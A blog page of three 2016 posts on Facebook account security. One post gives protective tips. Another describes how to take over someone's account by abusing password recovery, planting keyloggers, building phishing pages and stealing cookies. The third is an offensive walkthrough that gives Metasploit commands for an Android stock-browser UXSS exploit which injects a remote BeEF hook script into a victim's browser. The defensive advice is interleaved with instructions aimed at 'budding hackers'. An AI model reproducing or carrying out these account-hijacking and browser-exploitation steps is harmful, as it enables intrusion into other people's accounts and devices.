Friday, 29 July 2016

Protect Your Facebook Account From Hackers 2015

Protect Your Facebook Account From Hackers 2015

If you Google “how to” the first or second result usually is “how to hack Facebook”. This instant search result tell us that, apparently many people wants to know how Facebook can be hacked.
hack facebook on google results
There are many ways to hack Facebook account. Some uses phishing attack, some take a help of keylogger while the rest uses common password. However it goes without saying, ‘How important it’s to secure your Facebook account’.
Every Facebook account store so much personal information, that would cause disaster, if the went public. Therefore here are some simple steps will keep your Facebook account secure.

 1Enable email/sms notification

This is a great way to protect your Facebook account from hackers, if you suspect suspicious activity on your account. To get it done follow the simple steps
1. Just go to Settings > Security> Login Alerts >Edit > Enter the details and save changes
2. Now you will get SMS/Email, each you or someone else login to Facebook account.
facebook-login-notification

2. Enable Secure Browsing

This is must for every Facebook user. Follow the steps
  1. Go to Account Setting
  2. Choose Security tab
  3. Click on Secure Browsing tab, as shown above
From now on you would notice https://www.facebook.com/ instead of http://www.facebook.com/

 3. Security Question

Set up a good security question, which is not easy to guess. Not even your close friend can guess it.
What bad guys do is, They change your security question and then when they have to login they click on forget password link and by using security question they can login to your Facebook account without even knowing your password.

4. Close Active Sessions

Even if you close your browser without logging out of Facebook account . you are still consider to be logged in that device. I don’t know how but remote hackers can gain access to this and hacked your account very easily . So it’s always advisable to close you active session on the device if you are not planning to login for the long time from the same device.
Go to the security and look for Active Sessions option.
Close Your Facebook Active Sessions

5. Check For The Url

Example of fake facebook page

Check for the url in the address bar  and login only if it says www.facebook.com. Often hackers use fake login page (phishing) and when you login through that page, your password and username is automatically redirected to them.

6. Password

Pick a unique, strong password. Change your Facebook password as often as possible, especially if you find any suspicious activity on your wall and don’t give your username and password to anyone, not even your friends.
Don’t share you password not even with your close friends, colleagues and family member.

7. Use Private browser

If you are logging anywhere else then you home computer than it’s better to open it in private browsing only. It won’t store your username  and password or any other information and you don’t have to worry about sign out , you can just close the window.

8. Stay Updated

Don’t add people who you don’t know especially if it seems to be a fake profile. They are mostly spammers or hackers who can retrieve your personal information .
Don’t trust every third party Facebook applications some of them might be spams .Use only those which are very popular and can be trusted.
For more info read  Facebook security page.

What to do if your Facebook account got hacked?

First thing to do is check if you can login with password , if yes then change your password immediately and then delete all the post and messages that was post on your behalf and then setup more secure settings like one shown above. 
In case you are not able to login with your old username and password then report abuse that profile , just ask your friends to do that for you, more people report abuse faster that profile will be deleted.
Report to Facebook if your account was hacked to  www.facebook.com/hacked/
Always add a secondary email id to your Facebook account , in case you don’t have access to your account , Facebook will send you recovery password there.
Add a secondary email ID to your account.
Posted by at No comments:

Thursday, 28 July 2016

4 Ways to Crack a Facebook Password & How to Protect Yourself from Them

We use Facebook as a tool to connect, but there are those people who use that connectivity for malicious purposes. We reveal what others can use against us. They know when we're not home and for how long we're gone. They know the answers to our security questions. People can practically steal our identities—and that's just with the visible information we purposely give away through our public Facebook profile.
Image via Digital Trends
The scariest part is that as we get more comfortable with advances in technology, we actually become more susceptible to hacking. As if we haven't already done enough to aid hackers in their quest for our data by sharing publicly, those in the know can get into our emails and Facebook accounts to steal every other part of our lives that we intended to keep away from prying eyes.
In fact, you don't even have to be a professional hacker to get into someone's Facebook account.
It can be as easy as running Firesheep on your computer for a few minutes. In fact, Facebook actually allows people to get into someone else's Facebook account without knowing their password. All you have to do is choose three friends to send a code to. You type in the three codes, and voilà—you're into the account. It's as easy as that.
In this article I'll show you these, and a couple other ways that hackers (and even regular folks) can hack into someone's Facebook account. But don't worry, I'll also show you how to prevent it from happening to you.

Method 1Reset the Password

The easiest way to "hack" into someone's Facebook is through resetting the password. This could be easier done by people who are friends with the person they're trying to hack.
  • The first step would be to get your friend's Facebook email login. If you don't already know it, try looking on their Facebook page in the Contact Info section.
  • Next, click on Forgotten your password? and type in the victim's email. Their account should come up. Click This is my account.
  • It will ask if you would like to reset the password via the victim's emails. This doesn't help, so press No longer have access to these?
  • It will now ask How can we reach you? Type in an email that you have that also isn't linked to any other Facebook account.
  • It will now ask you a question. If you're close friends with the victim, that's great. If you don't know too much about them, make an educated guess. If you figure it out, you can change the password. Now you have to wait 24 hours to login to their account.
  • If you don't figure out the question, you can click on Recover your account with help from friends. This allows you to choose between three and five friends.
  • It will send them passwords, which you may ask them for, and then type into the next page. You can either create three to five fake Facebook accounts and add your friend (especially if they just add anyone), or you can choose three to five close friends of yours that would be willing to give you the password.

How to Protect Yourself

  • Use an email address specifically for your Facebook and don't put that email address on your profile.
  • When choosing a security question and answer, make it difficult. Make it so that no one can figure it out by simply going through your Facebook. No pet names, no anniversaries—not even third grade teacher's names. It's as easy as looking through a yearbook.
  • Learn about recovering your account from friends. You can select the three friends you want the password sent to. That way you can protect yourself from a friend and other mutual friends ganging up on you to get into your account.

Method 2Use a Keylogger

Software Keylogger
A software keylogger is a program that can record each stroke on the keyboard that the user makes, most often without their knowledge. The software has to be downloaded manually on the victim's computer. It will automatically start capturing keystrokes as soon as the computer is turned on and remain undetected in the background. The software can be programmed to send you a summary of all the keystrokes via email.
CNET has Free Keylogger, which as the title suggests, is free. If this isn't what you're looking for, you can search for other free keyloggers or pay for one.
Hardware Keylogger
These work the same way as the software keylogger, except that a USB drive with the software needs to be connected to the victim's computer. The USB drive will save a summary of the keystrokes, so it's as simple as plugging it to your own computer and extracting the data. You can look through Keelog for prices, but it's bit higher than buying the software since you have the buy the USB drive with the program already on it.

How to Protect Yourself

  • Use a firewall. Keyloggers usually send information through the internet, so a firewall will monitor your computer's online activity and sniff out anything suspicious.
  • Install a password manager. Keyloggers can't steal what you don't type. Password mangers automatically fill out important forms without you having to type anything in.
  • Update your software. Once a company knows of any exploits in their software, they work on an update. Stay behind and you could be susceptible.
  • Change passwords. If you still don't feel protected, you can change your password bi-weekly. It may seem drastic, but it renders any information a hacker stole useless.

Method 3Phishing

This option is much more difficult than the rest, but it is also the most common method to hack someone's account. The most popular type of phishing involvescreating a fake login page. The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook. This process is difficult because you will need to create a web hosting account and a fake login page.
The easiest way to do this would be to follow our guide on how to clone a websiteto make an exact copy of the facebook login page. Then you'll just need to tweak the submit form to copy / store / email the login details a victim enters. If you need help with the exact steps, there are detailed instructions available by Alex Long here on Null Byte. Users are very careful now with logging into Facebook through other links, though, and email phishing filters are getting better every day, so that only adds to this already difficult process. But, it's still possible, especially if you clone the entire Facebook website.

How to Protect Yourself

  • Don't click on links through email. If an email tells you to login to Facebook through a link, be wary. First check the URL (Here's a great guide on what to look out for). If you're still doubtful, go directly to the main website and login the way you usually do.
  • Phishing isn't only done through email. It can be any link on any website / chat room / text message / etc. Even ads that pop up can be malicious. Don't click on any sketchy looking links that ask for your information.
  • Use anti-virus & web security software, like Norton or McAfee.

Method 4Stealing Cookies

Cookies allow a website to store information on a user's hard drive and later retrieve it. These cookies contain important information used to track a session that a hacker can sniff out and steal if they are on the same Wi-Fi network as the victim. They don't actually get the login passwords, but they can still access the victim's account by cloning the cookies, tricking Facebook into thinking the hacker's browser is already authenticated.
Image via Wikimedia Commons
Firesheep is a Firefox add-on that sniffs web traffic on an open Wi-Fi connection. It collects the cookies and stores them in a tab on the side of the browser.
From there, the hacker can click on the saved cookies and access the victim's account, as long as the victim is still logged in. Once the victim logs out, it is impossible for the hacker to access the account.

A Couple More Facebook Hacks

For those with a bit more technical skill, check out the Same Origin Policy Facebook hack and the somewhat easier, Facebook Password Extractor. We will continue add more Facebook hacks in the near future, so keep coming back here.

How to Protect Yourself

  • On Facebook, go to your Account Settings and check under Security. Make sure Secure Browsing is enabled. Firesheep can't sniff out cookies over encrypted connections like HTTPS, so try to steer away from HTTP.
  • Full time SSL. Use Firefox add-ons such as HTTPS-Everywhere or Force-TLS.
  • Log off a website when you're done. Firesheep can't stay logged in to your account if you log off.
  • Use only trustworthy Wi-Fi networks. A hacker can be sitting across from you at Starbucks and looking through your email without you knowing it.
  • Use a VPN. These protect against any sidejacking from the same WiFi network, no matter what website you're on as all your network traffic will be encrypted all the way to your VPN provider.
Posted by at No comments:

How to Hack Facebook

This is the initial post of a new series on how to hack Facebook. It's important to note here that each hack I'll be covering is very specific. I have said it before, but I feel I need to repeat it again: there is NO SILVER BULLET that works under all circumstances. Obviously, the good folks at Facebook have taken precautions to make certain that their app is not hacked, but if we are creative, persistent, and ingenious, we can still get in.
Facebook is one of the most secure applications on the Internet and, despite what you might read on the Internet, it is NOT easy to hack. In addition, most of those websites on the Internet willing to sell you a Facebook hack are scams. Don't give them a penny!
If you want to hack Facebook, you need to invest some time into learning. If you are new to hacking, you might want to start with my article "How to Use Null Byte to Study to Become a Professional Hacker."
In addition, I want to put in a word about what we mean by the word "hack." In some cases, we might get the password which, of course, will give us full access to the Facebook account. In other cases, we might just get access to the account without any rights. In still other schemes, we might get the cookies that Facebook places in the user's browser and then place it in our browser for access to the account whenever we please. In yet another scenario, we can place ourselves between the user and Facebook in a form of MitM attack, to get the password, etc.
In this first entry in this series, we will use a flaw in the stock Android web browser that will provide us with access to the Facebook account. I hope it goes without saying that this hack will only work when the user has accessed their Facebook account from the stock Android browser, not the Facebook mobile app. Although Google is aware of this security flaw in their browser, it is not automatically patched or replaced on existing systems. As a result, this hack will work on most Android systems.

Same Origin Policy

Same-origin policy (SOP) is one of the key security measures that every browser should meet. What it means is that browsers are designed so that webpages can't load code that is not part of their own resource. This prevents attackers from injecting code without the authorization of the website owner.
Unfortunately, the default Android browser can be hacked as it does not enforce the SOP policy adequately. In this way, an attacker can access the user's other pages that are open in the browser, among other things. This means that if we can get the user to navigate to our website and then send them some malicious code, we can then access other sites that are open in their browser, such as Facebook.
For those of you are new to Null Byte and hacking, I recommend that you start by installing Kali Linux. In this hack, we will need two tools, Metasploit and BeEF, both of which are built into our Kali Linux system.

Step 1Open Metasploit

Let's begin by firing up Kali and then opening Metasploit by typing:
kali > msfconsole
You should get a screen like this.
For those of you unfamiliar with Metasploit, check out my series on using Metasploit for more information on using it successfully.

Step 2Find the Exploit

Next, let's find the exploit for this hack by typing:
msf > search platform:android stock browser
When we do so, we get only one module:
auxiliary/gather/android_stock_browser_uxss
Let's load that module by typing:
msf > use auxiliary/gather/android_stock_browser_uxss

Step 3Get the Info

Now that we have loaded the module, let's get some information on this module. We can do this by typing:
msf > info
As you can see from this info page, this exploit works against all stock Android browsers before Android 4.4 KitKat. It tells us that this module allows us to run arbitrary JavaScript in the context of the URL.

Step 4Show Options

Next, let see what options we need to set for this module to function. Most importantly, we need to set the REMOTE_JS that I have highlighted below.

Step 5Open BeEF

Now, open BeEF. Please take a look at this tutorial on using BeEF, if you are are unfamiliar the tool.

Step 6Set JS to BeEF Hook

Back to Metasploit now. We need to set the REMOTE_JS to the hook on BeEF. Of course, make certain you use the IP of the server that BeEF is running on.
msf > set REMOTE_JS http://192.168.1.107:3000/hook.js
Next, we need to set the URIPATH to the root directory /. Let's type:
msf > set uripath /

Step 7Run the Server

Now we need to start the Metasploit web server. What will happen now is that Metasploit will start its web server and serve up the BeEF hook so that when anyone navigates to that website, it will have their browser hooked to BeEF.
msf > run

Step 8Navigate to the Website from an Android Browser

Now we are replicating the behavior of the victim. When they navigate to the website hosting the hook, it will automatically inject the JavaScript into their browser and hook it. So, we need to use the stock browser on an Android device and go to 192.168.1.107:8080, or whatever the IP is of your website.

Step 9Hook Browser

When the user/device visits our web server at 192.168.1.107, the BeEF JavaScript will hook their browser. It will show under the "Hooked Browser" explorer in BeEF. We now control their browser!

Step 10Detect if the Browser Is Authenticated to Facebook

Now let's go back to BeEF and go to the "Commands" tab. Under the "Network" folder we find the "Detect Social Networks" command. This command will check to see whether the victim is authenticated to Gmail, Facebook, or Twitter. Click on the "Execute" button in the lower right.
When we do so, BeEF will return for us the results. As you can see below, BeEF returned to us that this particular user was not authenticated to Gmail or Facebook, but was authenticated to Twitter.
Now, we need to simply wait until the user is authenticated to Facebook and attempt this command again. Once they have authenticated to Facebook, we can direct a tab to open the user's Facebook page, which we will do in our next Facebook hack tutorial.
We will continue to explore more ways to hack Facebook, Twitter, and Gmail in future articles, so keep coming back, my budding hackers!
Posted by at No comments:
Subscribe to: Posts (Atom)